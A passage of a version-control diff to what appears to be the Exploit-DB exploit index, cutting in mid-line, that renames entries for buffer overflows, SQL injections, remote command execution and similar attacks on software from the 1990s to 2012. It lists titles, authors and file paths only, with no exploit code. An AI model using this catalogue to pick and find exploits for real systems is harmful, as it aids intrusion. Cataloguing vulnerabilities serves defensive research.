Moules",php,webapps,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution",2012-02-25,Metasploit,windows,remote,0 -18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0 +18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution",2012-02-25,ls,php,webapps,0 18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file Parameter) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 18524,platforms/windows/dos/18524.py,"Tiny HTTP Server 1.1.9 - Remote Crash (PoC)",2012-02-25,localh0t,windows,dos,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery - SQL Injection",2012-02-25,CorryL,php,webapps,0 @@ -16064,7 +16065,7 @@ id,file,description,date,author,platform,type,port 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 -18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH Username Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 +18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0 @@ -16086,7 +16087,7 @@ id,file,description,date,author,platform,type,port 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQL Injections",2012-03-03,G13,php,webapps,0 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow",2012-03-03,Vulnerability-Lab,windows,remote,0 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 -18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH Username Buffer Overflow (Metasploit)",2012-03-04,Metasploit,windows,remote,0 +18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH 'Username' Buffer Overflow (Metasploit)",2012-03-04,Metasploit,windows,remote,0 18558,platforms/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection",2012-03-04,"Easy Laster",php,webapps,0 18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - Local File Inclusion",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0 @@ -16125,7 +16126,7 @@ id,file,description,date,author,platform,type,port 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,php,webapps,0 18608,platforms/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent Cross-Site Scripting",2012-03-16,storm,php,webapps,0 18609,platforms/php/webapps/18609.txt,"FlexCMS 3.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-16,"Ivano Binetti",php,webapps,0 -18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure Exploit",2012-03-16,KaHPeSeSe,windows,remote,0 +18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure",2012-03-16,KaHPeSeSe,windows,remote,0 18611,platforms/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - '.m3u' Buffer Overflow (Metasploit)",2012-03-16,KaHPeSeSe,windows,local,0 18704,platforms/windows/remote/18704.txt,"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control (pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 18705,platforms/hardware/dos/18705.txt,"Sony Bravia - Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",hardware,dos,0 @@ -16162,7 +16163,7 @@ id,file,description,date,author,platform,type,port 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0 18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 -18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 +18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - (ajax.php) Remote Command Execution",2012-03-23,EgiX,php,webapps,0 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 @@ -16221,7 +16222,7 @@ id,file,description,date,author,platform,type,port 18735,platforms/windows/remote/18735.rb,"Quest InTrust Annotation Objects - Uninitialized Pointer",2012-04-13,Metasploit,windows,remote,0 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0 -18738,platforms/php/remote/18738.rb,"V-CMS - PHP File Upload and Execute",2012-04-14,Metasploit,php,remote,0 +18738,platforms/php/remote/18738.rb,"V-CMS - PHP File Upload and Execution",2012-04-14,Metasploit,php,remote,0 18739,platforms/windows/dos/18739.txt,"Irfanview FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18741,platforms/php/webapps/18741.txt,"joomla Component (com_ponygallery) - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 @@ -16238,7 +16239,7 @@ id,file,description,date,author,platform,type,port 18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' PoC (MS11-046)",2012-04-19,fb1h2s,windows,dos,0 18756,platforms/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0 18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos,0 -18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 +18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' Null Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow",2012-04-20,Metasploit,windows,remote,0 18760,platforms/windows/local/18760.rb,"xRadio 0.95b - Buffer Overflow",2012-04-20,Metasploit,windows,local,0 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution",2012-04-20,Metasploit,linux,remote,0 @@ -16279,7 +16280,7 @@ id,file,description,date,author,platform,type,port 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 18806,platforms/php/webapps/18806.txt,"WordPress Zingiri Web Shop Plugin 2.4.2 - Persistent Cross-Site Scripting",2012-05-01,"Mehmet Ince",php,webapps,0 18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 -18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - SEH Overwrite",2012-05-01,blake,windows,local,0 +18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - Overwrite (SEH)",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injections",2012-05-01,Vulnerability-Lab,php,webapps,0 18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject",2012-05-01,Metasploit,windows,remote,0 18813,platforms/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,php,webapps,0 @@ -16312,7 +16313,7 @@ id,file,description,date,author,platform,type,port 18844,platforms/php/webapps/18844.txt,"myCare2x CMS - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0 18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,php,webapps,0 18847,platforms/windows/remote/18847.rb,"Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access",2012-05-09,Metasploit,windows,remote,0 -18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin) Exploit",2012-05-09,DennSpec,php,webapps,0 +18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)",2012-05-09,DennSpec,php,webapps,0 18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - '.gpx' Crash (PoC)",2012-05-09,condis,windows,dos,0 18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid - ActiveX Control Remote Code Execution",2012-05-09,"Francis Provencher",windows,dos,0 18853,platforms/windows/dos/18853.txt,"SAP NetWeaver Dispatcher - Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 @@ -16337,11 +16338,11 @@ id,file,description,date,author,platform,type,port 18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 - Backend Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (Cross-Site Request Forgery/Persistent Cross-Site Scripting) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 -18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure Exploit",2012-05-16,LiquidWorm,php,webapps,0 +18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure",2012-05-16,LiquidWorm,php,webapps,0 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 -18893,platforms/hardware/remote/18893.py,"HP VSA - Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 +18893,platforms/hardware/remote/18893.py,"HP VSA - Remote Command Execution",2012-02-17,"Nicolas Gregoire",hardware,remote,0 18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034)",2012-05-18,Cr4sh,windows,dos,0 18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection",2012-05-19,Metasploit,php,remote,0 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Request Buffer Overflow",2012-05-19,Metasploit,windows,remote,0 @@ -16421,7 +16422,7 @@ id,file,description,date,author,platform,type,port 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0 19012,platforms/php/webapps/19012.txt,"WordPress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 19013,platforms/php/webapps/19013.txt,"WordPress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19005,platforms/php/webapps/19005.txt,"SN News 1.2 - (/admin/loger.php) Authentication Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 +19005,platforms/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass (SQL Injection)",2012-06-07,"Yakir Wizman",php,webapps,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Exploit",2012-06-07,b33f,windows,local,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution",2012-06-06,Metasploit,windows,remote,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",php,webapps,0 @@ -16539,7 +16540,7 @@ id,file,description,date,author,platform,type,port 19135,platforms/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 -19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 +19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,Metasploit,windows,remote,0 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0 19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Exploit",1999-01-07,"Richard M. Smith",windows,local,0 @@ -16563,8 +16564,8 @@ id,file,description,date,author,platform,type,port 19164,platforms/windows/remote/19164.txt,"Microsoft Internet Explorer 4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 -19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian Linux 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (1)",1997-04-26,cesaro,unix,local,0 -19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian Linux 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (2)",1997-04-26,BeastMaster,unix,local,0 +19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (1)",1997-04-26,cesaro,unix,local,0 +19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (2)",1997-04-26,BeastMaster,unix,local,0 19174,platforms/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,php,webapps,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Buffer Overflow",2012-06-15,Metasploit,windows,local,0 @@ -16593,7 +16594,7 @@ id,file,description,date,author,platform,type,port 19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1)",1997-08-25,bloodmask,unix,local,0 19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2)",1997-08-25,jGgM,unix,local,0 19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3)",1997-08-25,jGgM,unix,local,0 -19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian Linux 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin",1996-12-04,"Roger Espel Llima",unix,local,0 +19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin",1996-12-04,"Roger Espel Llima",unix,local,0 19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 - EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 @@ -16634,7 +16635,7 @@ id,file,description,date,author,platform,type,port 19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 19242,platforms/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote Command Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink",1999-06-02,"Thomas Fischbacher",linux,local,0 -19244,platforms/osx/local/19244.sh,"Apple Mac OS X Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 +19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 19245,platforms/windows/remote/19245.pl,"Microsoft IIS 4.0 - Buffer Overflow (1)",1999-06-15,"eEye Digital Security Team",windows,remote,0 19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0 @@ -16643,10 +16644,10 @@ id,file,description,date,author,platform,type,port 19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs",1999-02-19,"Brian Jones",linux,dos,0 19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0 19401,platforms/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 -19253,platforms/linux/remote/19253.txt,"Debian Linux 2.1 - httpd",1999-06-17,anonymous,linux,remote,0 -19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 - gnuplot",1999-03-04,xnec,linux,local,0 +19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd",1999-06-17,anonymous,linux,remote,0 +19254,platforms/linux/local/19254.c,"S.u.S.E. 5.2 - gnuplot",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 -19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian Linux 2.0 - netstd",1999-01-03,anonymous,linux,local,0 +19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0 @@ -16660,7 +16661,7 @@ id,file,description,date,author,platform,type,port 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin - Exploit",1996-08-06,"Grant Kaufmann",irix,local,0 19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 colorview - Exploit",1995-02-09,"Dave Sill",irix,local,0 -19270,platforms/linux/local/19270.c,"Debian Linux 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0 +19270,platforms/linux/local/19270.c,"Debian 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port Denial of Service",1999-01-19,"David Schwartz",linux,dos,0 19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot",1999-01-26,"Dan Burcaw",linux,dos,0 19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier",1997-05-16,"Mike Neuman",irix,local,0 @@ -16679,7 +16680,7 @@ id,file,description,date,author,platform,type,port 19286,platforms/linux/local/19286.c,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (2)",1997-05-27,"Solar Designer",linux,local,0 19287,platforms/aix/local/19287.c,"IBM AIX 4.3 infod - Exploit",1998-11-21,"Repent Security Inc",aix,local,0 19288,platforms/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0 -19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - NULL Pointer Dereference",2012-06-19,"Luigi Auriemma",windows,dos,0 +19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - Null Pointer Dereference",2012-06-19,"Luigi Auriemma",windows,dos,0 19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 - Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Stack Buffer Overflow",2012-06-19,Metasploit,windows,remote,0 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities",2012-06-19,Vulnerability-Lab,php,webapps,0 @@ -16760,14 +16761,14 @@ id,file,description,date,author,platform,type,port 19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0 19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,netware,local,0 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0 -19384,platforms/linux/local/19384.c,"Debian Linux 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 +19384,platforms/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes - SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player - Object Type Confusion",2012-06-25,Metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 19372,platforms/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 - Null Session Admin Name",1999-06-28,"J D Glaser",windows,dos,0 -19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 -19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 +19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 +19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard 3.0.5 - Log Service Directory Traversal",1999-02-22,eEYe,multiple,remote,0 19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",multiple,dos,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0 @@ -16966,7 +16967,7 @@ id,file,description,date,author,platform,type,port 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Spoolss.exe DLL Insertion",1999-11-04,"Marc of eEye",windows,local,0 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities",1999-11-03,Kerb,windows,remote,0 -19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long Username Denial of Service",1999-11-03,"Ussr Labs",windows,dos,0 +19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long 'Username' Denial of Service",1999-11-03,"Ussr Labs",windows,dos,0 19597,platforms/php/webapps/19597.txt,"Guestbook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 @@ -17010,7 +17011,7 @@ id,file,description,date,author,platform,type,port 19639,platforms/windows/dos/19639.txt,"Alt-N MDaemon 2.8.5 - WebConfig Overflow Denial of Service",1999-11-24,"Ussr Labs",windows,dos,0 19640,platforms/windows/dos/19640.txt,"Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL Denial of Service",1999-11-26,"Ussr Labs",windows,dos,0 19641,platforms/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow",1999-11-25,K2,sco,local,0 -19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 - xlock(1) (long username) Buffer Overflow",1999-11-25,AK,sco,local,0 